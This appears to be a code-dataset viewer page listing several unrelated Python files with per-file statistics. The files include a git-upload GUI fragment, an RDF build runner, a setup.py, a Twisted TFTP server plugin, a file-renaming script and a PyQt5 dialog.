                    call(['git', 'add', '--all'], stdout=FNULL)
                    call(['git', 'commit', '-m', cmsg], stdout=FNULL)
                    call(['git', 'push'], stdout=FNULL, stderr=FNULL)

            # Se sube archivo pdf (solo si se compiló y el archivo existe)
            pdf_file = RELEASES[jver]['PDF_FOLDER'].format(lastvup)
            cmsg = GITHUB_PDF_COMMIT.format(lastv, RELEASES[jver]['NAME'])
            if os.path.isfile(pdf_file) and self._lascpdf:
                with open(os.devnull, 'w') as FNULL:
                    with Cd(self._getconfig('PDF_ROOT')):
                        pdf_file = pdf_file.replace(self._getconfig('PDF_ROOT'), '')
                        call(['git', 'add', pdf_file], stdout=FNULL)
                        call(['git', 'commit', '-m', cmsg], stdout=FNULL)
                        call(['git', 'push'], stdout=FNULL, stderr=FNULL)

            # Se sube estadísticas
            cmsg = GITHUB_STAT_COMMIT.format(lastv, RELEASES[jver]['NAME'])
            with open(os.devnull, 'w') as FNULL:
                with Cd(self._getconfig('STATS_ROOT') + 'stats/'):
                    call(['git', 'add', RELEASES[jver]['STATS']['GIT_ADD']], stdout=FNULL)
                    call(['git', 'commit', '-m', cmsg], stdout=FNULL)
                    call(['git', 'push'], stdout=FNULL, stderr=FNULL)

            # Se guarda la versión subida
            self._uploaded[jver] = lastv
            self._saveupload()

            # Se muestra tiempo de subida y se termina el proceso
            self._print(MSG_FOKTIMER.format(time.time() - t))
            self._uploadstatebtn('off')
        except Exception as e:
            messagebox.showerror('Error fatal', 'Ocurrio un error inesperado al procesar la solicitud.')
            self._log('OTHER', text=str(e), mode='ERROR')
            self._print('ERROR: EXCEPCIÓN INESPERADA')
            self._print(str(e))
            self._print(traceback.format_exc())
            self._sounds.alert()
            # Permite reintentar la subida
            self._uploadstatebtn('on')
        self._log('UPLOAD_COMPLETE')
        self._root.configure(cursor='arrow')
        self._root.title(TITLE)
        self._root.update()
        self._root.after(50, _scroll)
        return

    self._root.title(TITLE_UPLOADING.format(TITLE))
    self._root.configure(cursor='wait')
    self._root.update()
    for k in RELEASES.keys():
        if self._release.get() == RELEASES[k]['NAME']:
            v = get_last_ver(self._getconfig('STATS_ROOT') + RELEASES[k]['STATS']['FILE']).split(' ')[0]
            self._print(GITHUB_PRINT_MSG.format(v, RELEASES[k]['NAME']), end='')
            break
    # El trabajo pesado se difiere para que la UI alcance a refrescarse
    self._root.after(500, _callback)
    self._uploadstatebtn('off')
if __name__ == '__main__':
    # Script entry point: build the GUI and start the Tk event loop
    CreateVersion().execute()
| 41.908705 | 118 | 0.496124 | 3,817 | 39,478 | 4.937123 | 0.170291 | 0.061396 | 0.025259 | 0.020165 | 0.436668 | 0.397984 | 0.354205 | 0.343115 | 0.330751 | 0.323375 | 0 | 0.010138 | 0.390344 | 39,478 | 941 | 119 | 41.953241 | 0.77281 | 0.02566 | 0 | 0.404355 | 0 | 0 | 0.103419 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.031104 | null | null | 0.059098 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8fdab9e986f28b972fe777268c5b6d64795df2f2 | 2,740 | py | Python | py/_run_py3.py | FellowsFreiesWissen/- | 3e74e6531985b0e9ba2e34bf1f6a1224cc7b52f3 | [
"MIT"
] | 1 | 2021-02-08T20:33:41.000Z | 2021-02-08T20:33:41.000Z | py/_run_py3.py | FellowsFreiesWissen/- | 3e74e6531985b0e9ba2e34bf1f6a1224cc7b52f3 | [
"MIT"
] | null | null | null | py/_run_py3.py | FellowsFreiesWissen/- | 3e74e6531985b0e9ba2e34bf1f6a1224cc7b52f3 | [
"MIT"
] | 1 | 2021-01-01T17:23:40.000Z | 2021-01-01T17:23:40.000Z | __author__ = "Florian Thiery"
__copyright__ = "MIT Licence 2021, Florian Thiery"
__credits__ = ["Florian Thiery"]
__license__ = "MIT"
__version__ = "1.0"
__maintainer__ = "Florian Thiery"
__email__ = "mail@fthiery.de"
__status__ = "1.0"
__update__ = "2021-05-11"
import glob
import os
import os.path
dir_path = os.path.dirname(os.path.realpath(__file__))
print("start _run_py3.py...")
dir_path_ttl1 = dir_path.replace("\\py", "\\data_v1\\rdf\\ogham")
filelist1 = glob.glob(os.path.join(dir_path_ttl1, "*.ttl"))
for f in filelist1:
os.remove(f)
dir_path_ttl2 = dir_path.replace("\\py", "\\data_v1\\rdf\\geodata")
filelist2 = glob.glob(os.path.join(dir_path_ttl2, "*.ttl"))
for f in filelist2:
os.remove(f)
dir_path_ttl3 = dir_path.replace("\\py", "\\data_v1\\rdf\\crosstaböe")
filelist3 = glob.glob(os.path.join(dir_path_ttl3, "*.ttl"))
for f in filelist3:
os.remove(f)
print("removed all ttl files...")
# ogham
exec(open(dir_path + "/og_sites.py").read())
exec(open(dir_path + "/og_inscriptions.py").read())
exec(open(dir_path + "/og_locations.py").read())
exec(open(dir_path + "/og_persons.py").read())
exec(open(dir_path + "/og_readings.py").read())
exec(open(dir_path + "/og_stones.py").read())
exec(open(dir_path + "/og_words.py").read())
sum_ogham = int(_config.count(0))
# geodata
exec(open(dir_path + "/gs_baronies.py").read())
exec(open(dir_path + "/gs_counties.py").read())
exec(open(dir_path + "/gs_countries.py").read())
exec(open(dir_path + "/gs_ireland_island.py").read())
exec(open(dir_path + "/gs_provinces.py").read())
#exec(open(dir_path + "/gs_townlands.py").read())
step2 = int(_config.count(0))
sum_geodata = step2 - sum_ogham
# crostables
exec(open(dir_path + "/ct_barony_townland.py").read())
exec(open(dir_path + "/ct_country_province.py").read())
exec(open(dir_path + "/ct_county_barony.py").read())
exec(open(dir_path + "/ct_insc_read.py").read())
exec(open(dir_path + "/ct_site_barony.py").read())
exec(open(dir_path + "/ct_site_country.py").read())
exec(open(dir_path + "/ct_site_county.py").read())
exec(open(dir_path + "/ct_site_loc.py").read())
exec(open(dir_path + "/ct_site_province.py").read())
exec(open(dir_path + "/ct_site_townland.py").read())
exec(open(dir_path + "/ct_stone_insc.py").read())
exec(open(dir_path + "/ct_stone_person.py").read())
exec(open(dir_path + "/ct_stone_site.py").read())
exec(open(dir_path + "/ct_stone_squirrel.py").read())
exec(open(dir_path + "/ct_stone_word.py").read())
step3 = int(_config.count(0))
sum_crosstable = step3 - sum_ogham - sum_geodata
print("SUM TRIPLES OGHAM: " + str(sum_ogham))
print("SUM TRIPLES GEODATA: " + str(sum_geodata))
print("SUM TRIPLES CROSSTABLES: " + str(sum_crosstable))
print("SUM TRIPLES: " + str(_config.count(0)))
| 34.25 | 70 | 0.705474 | 440 | 2,740 | 4.061364 | 0.225 | 0.148853 | 0.172356 | 0.235031 | 0.552322 | 0.45775 | 0.45775 | 0.232233 | 0 | 0 | 0 | 0.016038 | 0.089781 | 2,740 | 79 | 71 | 34.683544 | 0.700481 | 0.026277 | 0 | 0.047619 | 0 | 0 | 0.297784 | 0.058956 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.047619 | 0.095238 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8fe85a2a5d2edcb245d3a863873043a418150fca | 349 | py | Python | setup.py | Huge/shamir | 10d6d74d985603c049e31d32d1ce528936989503 | [
"CC0-1.0"
] | 19 | 2018-10-27T02:45:22.000Z | 2021-07-16T06:40:03.000Z | setup.py | Huge/shamir | 10d6d74d985603c049e31d32d1ce528936989503 | [
"CC0-1.0"
] | 1 | 2020-05-15T08:46:48.000Z | 2020-05-15T08:46:48.000Z | setup.py | Huge/shamir | 10d6d74d985603c049e31d32d1ce528936989503 | [
"CC0-1.0"
] | 7 | 2018-08-11T16:37:09.000Z | 2021-08-23T14:13:35.000Z | from setuptools import setup, find_packages
setup(
name='shamir',
version='17.12.0',
url='https://github.com/kurtbrose/shamir',
author='Kurt Rose',
author_email='kurt@kurtrose.com',
decription="fast, secure, pure python shamir's secret sharing",
long_description = open('README.rst').read(),
py_modules=['shamir'],
) | 29.083333 | 67 | 0.679083 | 45 | 349 | 5.177778 | 0.844444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017065 | 0.160458 | 349 | 12 | 68 | 29.083333 | 0.778157 | 0 | 0 | 0 | 0 | 0 | 0.397143 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8ff3c00aaa0d4bbcbd5ccc63aaa8ef235fba188d | 528 | py | Python | test/a.py | liaohongdong/IPProxy | 90152f02708717c661b7c1532e4a131a55103950 | [
"MIT"
] | null | null | null | test/a.py | liaohongdong/IPProxy | 90152f02708717c661b7c1532e4a131a55103950 | [
"MIT"
] | 1 | 2021-03-31T19:17:41.000Z | 2021-03-31T19:17:41.000Z | test/a.py | liaohongdong/IPProxy | 90152f02708717c661b7c1532e4a131a55103950 | [
"MIT"
] | null | null | null | import time
import json
import random
if __name__ == '__main__':
# a = 10
# while '39.108.111.222:1080':
# a -= 1
# print(a)
# if a <= 0:
# break
# a = ['a', 'b', 'c', 'd']
# a = []
# while a:
# print(time.gmtime().tm_sec)
# time.sleep(3)
# a = {'d': 'd', 'c': 'c'}
# print(json.dumps(a))
# q = '{"d": "d", "c": "c"}'
# aa = json.loads(q)
# print(aa['c'])
a = -1
if -1 and a < 1:
print('1')
else:
print('2') | 20.307692 | 37 | 0.386364 | 74 | 528 | 2.635135 | 0.459459 | 0.030769 | 0.071795 | 0.041026 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076687 | 0.382576 | 528 | 26 | 38 | 20.307692 | 0.521472 | 0.541667 | 0 | 0 | 0 | 0 | 0.044248 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
8ff7d3fd7850ce85b7cdc21936b6c84557edd802 | 1,539 | py | Python | twisted/plugins/tftp_plugin.py | aivins/python-tx-tftp | 46abaa3e9e054d2bdce5d8e5c76a87b1f36b218c | [
"MIT"
] | 1 | 2021-02-06T11:26:32.000Z | 2021-02-06T11:26:32.000Z | twisted/plugins/tftp_plugin.py | techman83/python-tx-tftp | 46abaa3e9e054d2bdce5d8e5c76a87b1f36b218c | [
"MIT"
] | null | null | null | twisted/plugins/tftp_plugin.py | techman83/python-tx-tftp | 46abaa3e9e054d2bdce5d8e5c76a87b1f36b218c | [
"MIT"
] | 1 | 2016-12-20T02:42:27.000Z | 2016-12-20T02:42:27.000Z | '''
@author: shylent
'''
from tftp.backend import FilesystemSynchronousBackend
from tftp.protocol import TFTP
from twisted.application import internet
from twisted.application.service import IServiceMaker
from twisted.plugin import IPlugin
from twisted.python import usage
from twisted.python.filepath import FilePath
from zope.interface import implementer
def to_path(str_path):
    """
    Coerce a string path into a twisted FilePath instance.

    Used as the coercion callable for the ``root-directory`` option.

    :param str_path: Path as a string
    :return: ``FilePath`` wrapping *str_path*
    """
    return FilePath(str_path)
class TFTPOptions(usage.Options):
    """Command-line options accepted by the ``tftp`` twistd plugin."""

    optFlags = [
        ['enable-reading', 'r', 'Lets the clients read from this server.'],
        ['enable-writing', 'w', 'Lets the clients write to this server.'],
        ['verbose', 'v', 'Make this server noisy.']
    ]
    optParameters = [
        ['port', 'p', 1069, 'Port number to listen on.', int],
        ['root-directory', 'd', None, 'Root directory for this server.', to_path]
    ]

    def postOptions(self):
        """Validate parsed options; a root directory is mandatory."""
        if self['root-directory'] is None:
            raise usage.UsageError("You must provide a root directory for the server")
@implementer(IServiceMaker, IPlugin)
class TFTPServiceCreator(object):
    """twistd plugin that builds a UDP TFTP service from parsed options."""

    tapname = "tftp"
    description = "A TFTP Server"
    options = TFTPOptions

    def makeService(self, options):
        """
        Build the TFTP service.

        :param options: A parsed ``TFTPOptions`` instance
        :return: A UDP server service running the TFTP protocol
        """
        backend = FilesystemSynchronousBackend(options["root-directory"],
                                               can_read=options['enable-reading'],
                                               can_write=options['enable-writing'])
        return internet.UDPServer(options['port'], TFTP(backend))


# The plugin object twisted's plugin system discovers at import time.
serviceMaker = TFTPServiceCreator()
| 33.456522 | 86 | 0.662118 | 168 | 1,539 | 6.029762 | 0.458333 | 0.054294 | 0.043435 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003378 | 0.230669 | 1,539 | 45 | 87 | 34.2 | 0.852196 | 0.010396 | 0 | 0 | 0 | 0 | 0.223762 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088235 | false | 0 | 0.235294 | 0.029412 | 0.588235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
8904373aaecfdf0e3fe1f208451b5f80bdc6f598 | 515 | py | Python | ar_app/scripts/renamefiles.py | osetr/ar-opencv-python | ae62ebeed176ef2e6d8d68fbaaa7d402dadc3eb3 | [
"MIT"
] | 1 | 2020-11-22T13:55:11.000Z | 2020-11-22T13:55:11.000Z | ar_app/scripts/renamefiles.py | osetr/ar-opencv-python | ae62ebeed176ef2e6d8d68fbaaa7d402dadc3eb3 | [
"MIT"
] | null | null | null | ar_app/scripts/renamefiles.py | osetr/ar-opencv-python | ae62ebeed176ef2e6d8d68fbaaa7d402dadc3eb3 | [
"MIT"
] | null | null | null | import os
from natsort import natsorted
path_to_directory = input("Enter path to directory: ") + "/"
new_name = input("Enter new name for files: ")
try:
i = 0
list_of_files = natsorted(os.listdir(path_to_directory))
for file in list_of_files:
i += 1
extension = file.split(".")[1]
os.rename(
path_to_directory + file,
path_to_directory + new_name + str(i) + "." + extension,
)
except FileNotFoundError:
print("Got unccorect directory path")
| 27.105263 | 68 | 0.631068 | 67 | 515 | 4.641791 | 0.477612 | 0.096463 | 0.241158 | 0.115756 | 0.141479 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007874 | 0.260194 | 515 | 18 | 69 | 28.611111 | 0.808399 | 0 | 0 | 0 | 0 | 0 | 0.159223 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.0625 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8906e41b0e2eb2a80f686b6c8428c70bf8ab1bf1 | 1,387 | py | Python | keyman44/interface/rcv_page.py | sahabi/keyman44 | 73d62eac3b96ec6951b1d88edf5e0f7c787f7440 | [
"MIT"
] | null | null | null | keyman44/interface/rcv_page.py | sahabi/keyman44 | 73d62eac3b96ec6951b1d88edf5e0f7c787f7440 | [
"MIT"
] | null | null | null | keyman44/interface/rcv_page.py | sahabi/keyman44 | 73d62eac3b96ec6951b1d88edf5e0f7c787f7440 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui/rcv_page.ui'
#
# Created by: PyQt5 UI code generator 5.9
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
    """Generated UI for the receive dialog (address text, QR code, close button).

    NOTE: this file is produced by pyuic5; manual edits are lost on regeneration.
    """

    def setupUi(self, Dialog):
        """Create and lay out the dialog's widgets."""
        Dialog.setObjectName("Dialog")
        Dialog.resize(400, 300)
        self.pushButton = QtWidgets.QPushButton(Dialog)
        self.pushButton.setGeometry(QtCore.QRect(290, 260, 98, 27))
        self.pushButton.setObjectName("pushButton")
        self.qr_label = QtWidgets.QLabel(Dialog)
        self.qr_label.setGeometry(QtCore.QRect(55, 70, 311, 161))
        self.qr_label.setAlignment(QtCore.Qt.AlignCenter)
        self.qr_label.setObjectName("qr_label")
        self.address_label = QtWidgets.QLabel(Dialog)
        self.address_label.setGeometry(QtCore.QRect(20, 10, 371, 17))
        self.address_label.setObjectName("address_label")

        self.retranslateUi(Dialog)
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        """Set the (translatable) display texts on the widgets."""
        _translate = QtCore.QCoreApplication.translate
        Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
        self.pushButton.setText(_translate("Dialog", "Close"))
        self.qr_label.setText(_translate("Dialog", "QR CODE"))
        self.address_label.setText(_translate("Dialog", "Address"))
| 38.527778 | 69 | 0.695025 | 163 | 1,387 | 5.803681 | 0.447853 | 0.044397 | 0.05814 | 0.054968 | 0.063425 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035398 | 0.185292 | 1,387 | 35 | 70 | 39.628571 | 0.80177 | 0.131218 | 0 | 0 | 1 | 0 | 0.071846 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.043478 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.